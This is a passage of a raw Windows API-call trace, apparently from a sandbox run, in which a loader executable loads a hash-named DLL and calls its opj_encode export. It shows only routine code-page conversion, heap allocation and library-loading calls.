cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0188.410] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0188.410] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f790, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", lpUsedDefaultChar=0x0) returned 256 [0188.410] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0188.410] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0188.410] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0188.410] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0188.410] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f890, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0188.410] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x100) returned 0x5719d0 [0188.410] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7ff626f72300, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0188.410] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x168) returned 0x569a70 [0188.410] RtlInitializeSListHead (in: ListHead=0x7ff626f72160 | out: ListHead=0x7ff626f72160) [0188.410] GetLastError () returned 0x0 [0188.411] SetLastError (dwErrCode=0x0) [0188.411] GetEnvironmentStringsW () returned 0x574650* [0188.411] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x9cc) returned 0x575030 [0188.411] FreeEnvironmentStringsW (penv=0x574650) returned 1 [0188.411] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x118) returned 0x56a440 [0188.411] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x3e) returned 0x570740 [0188.411] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x5c) returned 0x560780 [0188.411] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x62) returned 0x564770 [0188.411] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x78) returned 0x56c6c0 [0188.411] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x62) returned 0x565a10 [0188.411] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x28) returned 0x56b3e0 [0188.411] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x48) returned 0x570330 [0188.411] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x1a) returned 0x56b470 [0188.411] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x3a) returned 0x5704c0 [0188.411] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x62) returned 0x5644e0 [0188.412] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x2a) returned 0x56c740 [0188.412] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x2e) returned 0x5647e0 [0188.412] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x1c) returned 0x56b890 [0188.412] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0xd2) returned 0x565ca0 [0188.412] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x7c) returned 0x563fd0 [0188.412] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x3a) returned 0x570920 [0188.412] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x90) returned 0x563c00 [0188.412] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x24) returned 0x56b950 [0188.412] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x30) returned 0x564550 [0188.412] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x36) returned 0x565a80 [0188.412] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x3c) returned 0x5701f0 [0188.412] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x52) returned 0x568ff0 [0188.412] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x3c) returned 0x5700b0 [0188.412] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0xd6) returned 0x5655e0 [0188.412] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x2e) returned 0x5620c0 [0188.412] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x1e) returned 0x56b770 [0188.412] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x2c) returned 0x562100 [0188.413] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x54) returned 0x569470 [0188.413] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x52) returned 0x5692f0 [0188.413] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x24) returned 0x56b380 [0188.413] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x42) returned 0x570010 [0188.413] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x2c) returned 0x562140 [0188.413] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x44) returned 0x570790 [0188.413] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x24) returned 0x56b4d0 [0188.413] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x575030 | out: hHeap=0x560000) returned 1 [0188.413] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x1000) returned 0x574650 [0188.413] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff626f52580) returned 0x0 [0188.414] GetStartupInfoW (in: lpStartupInfo=0x14fea0 | out: lpStartupInfo=0x14fea0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0188.414] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_encode" [0188.414] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_encode", pNumArgs=0x14fe70 | out: pNumArgs=0x14fe70) returned 0x569740*="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" [0188.415] LoadLibraryW (lpLibFileName="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") returned 0x7ffc45e90000 [0188.420] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0188.420] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0188.420] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0188.421] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0188.421] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0188.422] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0188.422] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0188.422] GetProcessHeap () returned 0x560000 [0188.423] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0188.423] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0188.423] GetLastError () returned 0x0 [0188.423] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0188.423] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0188.424] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x3c8) returned 0x575ae0 [0188.424] SetLastError (dwErrCode=0x0) [0188.424] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x1200) returned 0x575eb0 [0188.652] GetStartupInfoW (in: lpStartupInfo=0x14f6f0 | out: lpStartupInfo=0x14f6f0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0188.652] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0188.653] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0188.653] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0188.653] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_encode" [0188.653] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_encode" [0188.653] GetACP () returned 0x4e4 [0188.653] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x228) returned 0x56ac70 [0188.653] IsValidCodePage (CodePage=0x4e4) returned 1 [0188.654] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f6b0 | out: lpCPInfo=0x14f6b0) returned 1 [0188.654] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14ef50 | out: lpCPInfo=0x14ef50) returned 1 [0188.654] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0188.654] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14eca0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp") returned 256 [0188.654] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp", cchSrc=256, lpCharType=0x14f270 | out: lpCharType=0x14f270) returned 1 [0188.654] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0188.654] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0188.654] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0188.654] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0188.654] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0188.654] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0188.655] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f070, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ 